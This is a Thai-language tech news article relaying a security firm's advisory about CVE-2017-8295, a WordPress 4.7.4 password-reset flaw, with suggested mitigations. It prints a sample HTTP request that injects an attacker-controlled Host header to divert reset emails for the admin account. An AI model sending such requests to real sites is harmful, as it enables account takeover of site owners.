Breaking News

เตือนช่องโหว่ Zero-day บน WordPress เวอร์ชันล่าสุด ยังไม่มีแพทช์ !!

I-SECURE ผู้ให้บริการ Managed Security Services ชั้นนำของเมืองไทย ออกมาโพสต์แจ้งเตือนถึงช่องโหว่บน WordPress ระบบ CMS ยอดนิยม เวอร์ชัน 4.7.4 ล่าสุด ซึ่งช่วยให้แฮ็คเกอร์สามารถขโมยลิงค์สำหรับรีเซ็ตรหัสผ่านของเหยื่อได้ ที่สำคัญคือช่องโหว่นี้ยังไม่มีการออกแพทช์เพื่อแก้ไขแต่อย่างใด

I-SECURE ระบุว่า ช่องโหว่นี้ถูกค้นพบโดยนักวิจัยด้านความมั่นคงปลอดภัยที่ชื่อว่า Dawid Golunski ซึ่งมีรหัส CVE-2017-8295 โดยมีสาเหตุมาจากการจัดการ SERVER_NAME ที่ไม่ดีเพียงพอ โดยพบว่า การรีเซ็ตรหัสผ่านของ WordPress จะมีการนำค่าของ SERVER_NAME (ซึ่งสามารถกำหนดได้ผ่าน HOST Header ใน HTTP Request) ไปเป็นค่า From/Return-Path Header ของการตอบอีเมลรีเซ็ตรหัสผ่านกลับไป นั่นคือ ถ้าแฮ็คเกอร์กำหนดชื่อโฮสต์เป็น attackers-mxserver.com จะทำให้ From Header ของอีเมลที่ตอบกลับเปลี่ยนเป็น wordpress@attackers-mxserver.com แทน

ส่งผลให้ถ้าอีเมลรีเซ็ตรหัสผ่านที่ส่งออกไป ส่งไปไม่ถึงเจ้าของ WordPress ไม่ว่าด้วยกรณีใดๆ ก็ตาม เช่น อีเมลเต็ม (อาจถูกแฮ็คเกอร์ส่งไฟล์ขนาดใหญ่มาให้ก่อนการโจมตีเป็นจำนวนมาก) หรือ DNS Server ถูกโจมตี อีเมลที่ตีกลับมานั้น (ซึ่งปกติจะแนบเมลต้นฉบับมาด้วย) จะถูกส่งกลับมาที่อีเมลของแฮ็คเกอร์ (wordpress@attackers-mxserver.com) แทนทันที ผลลัพธ์คือแฮ็คเกอร์สามารถขโมยลิงค์ที่ใช้รีเซ็ตรหัสผ่านบนอีเมลไปใช้เพื่อแก้ไขรหัสผ่านใหม่ให้กลายเป็นของตัวเองได้

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

“ช่องโหว่นี้ส่งผลกระทบบน WordPress เวอร์ชันล่าสุด คือ 4.7.4 และยังไม่มีแพทช์สำหรับอุดช่องโหว่อย่างเป็นทางการ แนะนำให้ผู้ใช้ WordPress ปิดการรีเซ็ตรหัสผ่านของเว็บไซต์ชั่วคราว หรือกำหนดให้ชื่อโดเมนของ Host Header ที่เรียกเข้ามาเป็นแค่ชื่อโดเมนของเว็บไซต์เท่านั้น”I-SECURE แนะนำวิธีป้องกันช่องโหว่ระหว่างรออัปเดตแพทช์

รายละเอียดเกี่ยวกับช่องโหว่สามารถดูได้ที่: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

ขอขอบคุณข้อมูลและคำแนะนำจากบริษัท I-SECURE และ UIH ผู้ให้บริการ Managed Security Services และความมั่นคงปลอดภัยสำหรับ Data Center ชั้นนำของเมืองไทย



About techtalkthai

ทีมงาน TechTalkThai เป็นกลุ่มบุคคลที่ทำงานในสาย Enterprise IT ที่มีความเชี่ยวชาญทางด้าน Network, Security, Server, Storage, Operating System และ Virtualization มารวมตัวกันเพื่ออัพเดตข่าวสารทางด้าน Enterprise IT ให้แก่ชาว IT ในไทยโดยเฉพาะ

Check Also

[Guest Post] SAP พัฒนา Business Technology Platform ยกระดับการวิเคราะห์ดาต้าผ่านการทำ Data Excellence, Integration และ Extension สามหัวใจหลักที่จะช่วยให้องค์กรก้าวสู่การเป็น Intelligent Enterprise

SAP ประกาศการอัปเกรด Business Technology Platform ซึ่งมีฟีเจอร์ที่หลากหลายมากขึ้นและการเชื่อมต่อระบบที่มีประสิทธิภาพสูงขึ้น เพื่อสนับสนุนองค์กรให้เติบได้ด้วยการใช้ดาต้าอย่างเต็มประสิทธิภาพ โดย Business Technology Platform เป็นแพลตฟอร์มที่มอบบริการและเครื่องมือต่างๆ แบบบูรณาการ ให้นักพัฒนาระบบและผู้ใช้งานในองค์กร  สามารถสร้าง …

การเลือกใช้สาย LAN แบบ 28 AWG Patch Cord จะช่วยตอบโจทย์กลยุทธ์ของระบบ IT ในระยะยาวได้อย่างไร?

ท่ามกลางโลกของเทคโนโลยีที่เปลี่ยนแปลงอย่างรวดเร็วจนทำให้กลยุทธ์ของทุกองค์กรต้องกลายเป็นการปรับตัวรับความเปลี่ยนแปลงที่จะเกิดขึ้นให้ได้อยู่ตลอดนั้น ระบบ IT Infrastructure ที่ยืดหยุ่นจึงกลายเป็นปัจจัยสำคัญของธุรกิจที่จะทำให้เกิดความคุ้มค่าในระยะยาวและสามารถเปิดรับต่อเทคโนโลยีใหม่ๆ ได้อย่างต่อเนื่อง และแน่นอนว่าสาย LAN เองก็ถือเป็นหนึ่งใน IT Infrastructure ที่มีความสำคัญไม่แพ้เทคโนโลยีอื่นๆ ในบทความนี้เราจึงขอแนะนำสาย LAN ขนาด 28 AWG ที่จะมาช่วยเพิ่มความยืดหยุ่นให้กับระบบเครือข่าย และโซลูชันจาก Panduit ที่จะมาช่วยตอบโจทย์การเดินสายที่มีคุณภาพให้ทุกท่านได้รู้จักกันครับ